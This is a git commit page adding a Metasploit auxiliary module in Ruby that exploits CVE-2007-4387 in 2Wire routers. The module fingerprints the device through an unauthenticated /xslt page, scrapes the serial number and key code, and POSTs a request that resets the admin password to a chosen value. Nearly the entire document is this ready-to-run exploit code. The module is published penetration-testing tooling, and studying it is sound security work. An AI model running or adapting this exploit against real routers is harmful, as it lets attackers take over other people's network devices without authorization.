Added 2Wire Password Reset module by Travis
git-svn-id: file:///home/svn/framework3/trunk@13121 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
84dee0f06c
commit
a795dc7552
|
@ -0,0 +1,145 @@
|
||||||
|
##
|
||||||
|
# $Id$
|
||||||
|
##
|
||||||
|
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
|
||||||
|
'Description' => %q{
|
||||||
|
This module will reset the admin password on a 2Wire wireless router. This is
|
||||||
|
done by using the /xslt page where authentication is not required, thus allowing
|
||||||
|
configuration changes (such as resetting the password) as administrators.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Version' => "$Revision$",
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'hkm', #Initial discovery, poc
|
||||||
|
'Travis Phillips', #Msf module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '2007-4387' ],
|
||||||
|
[ 'OSVDB', '37667' ],
|
||||||
|
[ 'BID', '36075' ],
|
||||||
|
[ 'URL', 'http://seclists.org/bugtraq/2007/Aug/225' ],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => "Aug 15 2007" ))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(80),
|
||||||
|
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
|
||||||
|
print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
|
||||||
|
res = send_request_raw(
|
||||||
|
{
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => '/xslt?PAGE=A07',
|
||||||
|
}, 25)
|
||||||
|
|
||||||
|
#check to see if we get HTTP OK
|
||||||
|
if (res.code == 200)
|
||||||
|
print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
|
||||||
|
else
|
||||||
|
print_error("Did not get HTTP 200, URL was not found. Exiting!")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
#Check to verify server reported is a 2wire router
|
||||||
|
if (res.headers['Server'].match(/2wire Gateway/i))
|
||||||
|
print_status("Server is a 2wire Gateway! Grabing info\n")
|
||||||
|
else
|
||||||
|
print_error("Target doesn't seem to be a 2wire router. Exiting!")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("---===[ Router Information ]===---")
|
||||||
|
|
||||||
|
# Grabbing the Model Number
|
||||||
|
if res.body.match(/<td class="textmono">(.*)<\/td>/i)
|
||||||
|
model = $1
|
||||||
|
print_status("Model: #{model}")
|
||||||
|
end
|
||||||
|
|
||||||
|
# Grabbing the serial Number
|
||||||
|
if res.body.match(/<td class="data">(\d{12})<\/td>/i)
|
||||||
|
serial = $1
|
||||||
|
print_status("Serial: #{serial}")
|
||||||
|
end
|
||||||
|
|
||||||
|
# Grabbing the Hardware Version
|
||||||
|
if res.body.match(/<td class="data">(\d{4}-\d{6}-\d{3})<\/td>/i)
|
||||||
|
hardware = $1
|
||||||
|
print_status("Hardware Version: #{hardware}")
|
||||||
|
end
|
||||||
|
|
||||||
|
#Check the Software Version
|
||||||
|
if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
|
||||||
|
ver = $1
|
||||||
|
print_status("Software version: #{ver}")
|
||||||
|
else
|
||||||
|
print_error("Target is not a version 5 router. Exiting!")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# Grabbing the Key Code
|
||||||
|
if res.body.match(/<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)
|
||||||
|
key = $1
|
||||||
|
print_status("Key Code: #{key}\n")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
|
||||||
|
print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
|
||||||
|
|
||||||
|
res = send_request_raw(
|
||||||
|
{
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => '/xslt?PAGE=H04',
|
||||||
|
}, 25)
|
||||||
|
|
||||||
|
if ( res.code == 200 and res.body.match(/<title>System Setup - Password<\/title>/i))
|
||||||
|
print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
|
||||||
|
|
||||||
|
data = 'PAGE=H04_POST'
|
||||||
|
data << '&THISPAGE=H04'
|
||||||
|
data << '&NEXTPAGE=A01'
|
||||||
|
data << '&PASSWORD=' + datastore['PASSWORD']
|
||||||
|
data << '&PASSWORD_CONF=' + datastore['PASSWORD']
|
||||||
|
data << '&HINT='
|
||||||
|
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => '/xslt',
|
||||||
|
'data' => data,
|
||||||
|
}, 25)
|
||||||
|
|
||||||
|
if res.code == 200
|
||||||
|
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//))
|
||||||
|
cookie= $1
|
||||||
|
print_status("Got cookie #{cookie}. Password reset was successful!\n")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
Loading…
Reference in New Issue